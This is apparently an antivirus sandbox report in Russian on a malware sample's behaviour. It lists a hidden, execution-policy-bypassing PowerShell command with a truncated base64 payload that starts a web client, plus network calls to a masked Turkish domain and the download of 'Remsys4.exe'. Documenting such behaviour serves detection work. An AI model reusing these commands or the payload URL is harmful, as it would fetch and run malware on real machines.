Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex bypasS -NoP -W HiDDeN -Ec IAAJAAkACQAJACAAKAAgACAAIAAgACAAJgAoAGcARQB0AC0AYwBPAG0ATQBBAE4AZAAgAG4AZQB3AC0AbwBCAGoAKgApACAAIAAgAE4ARQBUAC4AdwBFAGIAQwBMAGkARQBuA...
- 'pi###s.com.tr':80
- 'pi###s.com.tr':443
- http://www.pi###s.com.tr/dene/Remsys4.exe
- 'pi###s.com.tr':443
- DNS ASK pi###s.com.tr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex bypasS -NoP -W HiDDeN -Ec IAAJAAkACQAJACAAKAAgACAAIAAgACAAJgAoAGcARQB0AC0AYwBPAG0ATQBBAE4AZAAgAG4AZQB3AC0AbwBCAGoAKgApACAAIAAgAE4ARQBUAC4AdwBFAGIAQwBMAGkARQBuA...' (со скрытым окном)